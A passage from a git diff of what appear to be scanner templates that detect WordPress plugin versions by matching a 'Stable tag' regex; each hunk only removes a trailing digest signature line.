4a0a00473045022100f545f8ba74a4aff00df24a2bc7f117bcf5d2106c27c1795f57181f114de2b76402202a0ac7d4057b7ddd45d2cb3ff4598c9bbd18e7a97b378bf8eb13d8968d9c2cba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 5fa041d70f..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200d9c6b075bfd7bf8699f50f56a76015b3dbead72a01f2c6f39c961b034a87626022100db556de5d5e1e787a0401448cd7050b573003b45ed943c360118649fc224fd94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index f79142d0ff..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b3da8dbf2455c34d01214bb5727a5814f72d75c14232131822d3fe40dec42ec6022100f1109782dbcc64e33f77b8154ed97474672976b7dad629e2ef6f5b986150e247:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 957e747775..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205d439a299151a804e3247d4d168c8020e6a5d7a486d11e0948b32a88dba04b4a02206f1966a8647e14aa8b71508663663e6a5baabbef8aab16699d9d6380acdc75c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index aa9d54a825..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220641c7dbb0a63e65cb81e2a6465a2a30306d6bedd0172f0dd505ef710921037ac022100ef9de39caa55d47f9a472337684f727d5cd66aedda684823a139444aa148dd85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 78bc313248..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022020714a55dd7aaee13d7cdcbe680fa4a90d2ddd927a07d0e68ee556f185c794dd022100c95f34417f92f7209f8c7769d9d7dd2eb0f979395337a6b5d52d8c129db56ba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 94693dc13b..2a233f389d 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d65b8c9592ccbe768f66b949219690387829b7a5726ace60858c55331f8b2cdb022066b95ac66ce46058697ff53ed0432913eb4e87077beab01b4fcf2d3e3d464419:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 1555ac0ac5..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eb374a9a85bd15bf1003a9666a87987778278bf85c50de0b35513115e62b355f02206020c9e5b3fad39ed95a89410c75ca8b8e78278552f19c3f09d4dd5eb900d8e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index a89fb007b6..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c46b16c3a19aee6ebd7a71c6115fababdefce1963542f7611cb836e0b9615f0c022019855483c52fc51207a7cdeb1a7fa8f2aa95a404a97d0814fc4e114167cf876b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 504ee1922a..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c0ada293c8dfccc9511966b22302422836ca1d0d982b0f6eecd283927c96f94a0221008f3d5b784c0f36eaef2e23c0f97453726034129dccb38ba604d282137e559ddc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index b2bc394033..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203c8789102d3799216727626ef6c0eae3c1734a037fd521e5050f5452f2900fad022100d99009f5c4994c67b25c158c4630199dd2e628693efaa9366a697522149ed1e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 1d082d0a67..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022059c3771b75c417bf7df845878739b8dda04c8032516bfba1bb83bb5dd4da036c022033a4b9ddaa6493a57520b3b3753b7ba5c8dd823562123893d3c1d3911c28593d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index de99a1599b..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a5c0d064644d48ca8fcad173d8bf4af6b6da4a0c031bb120e640c7ee8b2aa91b0220597fa8f878b7ba9db2bc62676ec72cae4cbe0124318375db2fd24987ca9c26d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 8caa3f56f2..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c3b45bf26459c97daeaea601fab989523092eb5e0e5b46fcadacb88a7686612d02207f0eae19d50f5b7d0b50540c01ffc8a29d32963da174415082b0b6506ccc4ba5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 600f2c63c6..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a2a32fb326f4441c4ab16f5a53d172fe8002335e8452d8481ac88088238d05310220330b75afb7cc79ccd504b9a727532123d30473da0ab992b55465fc3cc6763058:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 4d23ace4f4..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f93ed9c0441a194d16311d3e11f4e5863019ef1e7cfb8a91d5b0b95fabfa31d1022100f3701b9e0a12c0c6424646042d2503991024c71b58817b10315a5dcac737c901:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 8f00e315f8..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203698ea9cca658497546f7312eb5628465650c6aab7ac9754f97eb31573c2e0410221009c3db0b5433d5506cc9e118c87529086ded3fc804f569ddab6a4ee0ea4f5a5a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 0b750593aa..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f793ca539e88e9e914ecf4f71110d8fc43c0647eca1d72ee098f8bb5e153e6b502206757df360d74cc2d0225bb2de284464ff4b830a30d4639c806ad6ae9e386e113:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 99bdca94ad..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d4c20b5e9cabf4ce0ea4ad5f286d0c0b34dac655670076c1afa2ef1108378f0d022100fe1c311d29449840f51dabcfc542fc08e1a1be58c1171412e608cd5debe2f57d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index e302599f22..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022027ae21f8c1c7e9d0be6fbdf14e8a3d775fa85b6cfc3ca1a6039971354b0a4c9e02202bdab28c5d3a9c43f37b4bccf990bb8be8ccbf1afa630bece279c78a25b63caf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index b1b45b48f1..18a7437e94 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e90ac0ab6cc825819b760502792a9084d025fdf4efb162712d468c01b65e7ac702205c4873054998821d4e2118a80cab9b2147d7515b177c89982a7753e398a407d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 0e97086154..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220132138a113c070e657647d28b7942aad07aaee32f41f03e6026b9c9348b9d7c40221009bfd394ccb40def2634bade7678fecf0120ed68f7d1d4bedcadaabbbeed10c73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 6d580b9d6c..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a317a517f21d40dc44b12dec80fa34dcbe8ba91f1ac8db123d6e703525e2f9e0022044fb7ae81bdc67f9b26bf9ebf19386e3fd2ddbe387cc1774f36412038f3f33df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index d6a1c99c37..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220418eae59038526b5bc1839997e668bf98d06240f43c1db328cb709d13acb416a022020e09492778ab46ecb5002291bf67a0b301a8370bed9563ed83dfd54114133de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 7bdf591279..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220615c910bc80f4b642c0f52ec4f6a7288585a5ec4cfef1c4df4c0bcc578653a2d022100eeb7898ad9e1f7f1815d1cc96cdc1a80b40f468164fc4043450ec1e44ccf0bc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 42eb6308bd..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e601a29c37a10da966a0c3df788da41bfa788b7e02008e352f41ebbfcfcfd237022100fc9ee46647349bedce16a0e43a762cecc7eed6e38639e85c8c4e23a75c4086b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index b82523b7db..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cb4edc9998251f2a1c0ad6bca7402cff7067fd598d0b14ea8320907c706e9e18022100b47f9b96abd3056dcaaf2d2b7d2784be1d86347100deade29f15fc063a90b86c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8d054ccde3..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022005c05a4c6942926bae12f313220a77b1b7d581e7a79a9cd72c3660eb5d15fccd02207ba66684db114ca760ea2886ff0bdabff61a3781acf6d03975c1f54c2550f770:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index 24b0c6ba2c..c20ed6552a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ded162578fbfb3e474c6ca3ae58bae19797570f6ddfce3d2dfc79bcbdc11cb18022100ce607e76b8dc7891f3d7e3516ae7562a9aee344f6533f39167143126a7b92ddb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 36460ecb48..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210093152cb8230218542ac2ef1b9d6aed571c2feaab83e922429cc50c7e2a2caa800221008fdf667fb406e76fd56bd731c5f5348274fc25c80a1f859d679c58f84249e40d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 7cedebd036..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f4ab7223ddc090a92b533178e705d7cee6c68c702d32bdb1507d7ae2ef855020022100a529964b98c2362d96733c3460b9735249434eda811d0a71948d2e7627be6f7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index d19ed0cb20..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009fa55a264d9e31612ee536650068713f24a1fe215df6ac1b52f47cd9734bd8fc0221009dc86ba343be813a2469ed02f145da0cee359ba4fbeb839670706130bf216704:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index be29960821..38391bd9f3 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202821524033efa17d2fca70ec60830134ca536067dcce79bd7114fad4419a94bd022100ac5af014ad95431c59cd220ad65a39561edb624734eb5a6beaeec021ba4ea623:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 024218887e..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022051f4d8fc306599f9ffb133d3e2c5d7663be10f3e335ca10888bba09b64b7b16e022100b84979d003dfc4560b59ca852a625edd8351ed8c2f4395be6588ecd26320c081:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 6521dedde3..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204bf1b08fee8209732204687a75ae395a84ce55b510d5a952ac4c83d335a85a39022018212b0d7af8b50c38e5c14232edb54883f6cf8b96b7111200a8ee04ef987081:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index bcceeafd87..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220384c54a9d8523620f0892e1f589f230c601e27aa519c24b3c50c302898b5275202202089d3056a12fbb0ef93ecf69b9a98ff37eb4132c4d5f9198a2c536e190f0168:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index aa508f2a62..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200d21728b5885095a2973962f564179d15e5f54b0187320c1c96abdc04a78c7ad022100dcce5bd9b309e0f574a49282c6d4147f7b46e35c0935a99c69991bbe3e992384:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index d8bc48b089..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008f663ae97904ec84e48c313db50dbb42438f7d01095e1ea84ec59a21f4b28765022100e13ed266f3efe0b46b028e2e3a7411dfb1fe4d4f28d4b05a646536c61d20eaab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 813ce9edb7..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201c43ba4d4bd1c85cd3f250a587b4fdfa06bcabf730d94c59da3737682534f445022100cf6416bdd1dc8adb127abffd37b9eac50e15ed08adc5ca0b358e0a1414a93fe9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index a2cb00d9f9..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100faa15b270b1c9177f674598dd00767658dbf9320622036fb4a28e56d8528eae7022100925bfa4dca643f1015ebb95ef31074bf24b2b899a570bd1c9397d7df2ffbba72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 391d7f7896..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f6a59ac4be7913afc55992663012c9052bcc88c17df23370daf66cff81fd8961022100e486d3a773249b1dc27590dec065f42b02e70f8a38cf9098d8531526fc5d63f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 588f3967e3..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cc3ad00991b74e4b64309b4278b25ed8db827c27a7f82587a5b12e94ce25e375022017ade0c2338948189253365e75fbe2464490bd4efbcd9539180ffdc94f52d69f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 55647f9bea..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f165e0ebd95ec4f9e9fb51a8a9eb760abbd77722adab42327774a14dafe2e3a20221009c64c593f81a2f33fcc32323e047a60314dbce0514c0e9a96d1a939de1857c36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 0e325a8c53..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cef705e6829d69d725b7af0cfdcac044baee7984d5fc7e69493b5b1e880d9d8e022100b2dd450db9a4337b34bcbe0831230a5637df9a8e28ec377d48c1c1620c10fa35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 2187ac0afb..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008eeee39ff5ad98b2b4ce86d6286b5476a2ad127bc0f947c7dc7168c9cfe28128022100c4a080507b1cc60d7967f421a4cc252d34bda0c85d85c2b1a127ac2da214efab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 217e7b3c1a..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100867949d8c49f0573ce15f3653d1ff961f41d7df96eeb793a40498c70c6a2438a0221008e2b6830bf763f26750231cdec2268fa6e091560810b22cafcc120ca1d739eef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 0892a17c74..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203cba785d29fea62413e56d7c9773dd9766efed4feb67f3f3c65c5a413a02b385022100b63ad1ce3adcc4da90a80844eae6110327d9f6c5f663a6be0ed0bf78ed492b3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 9c5925639b..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ 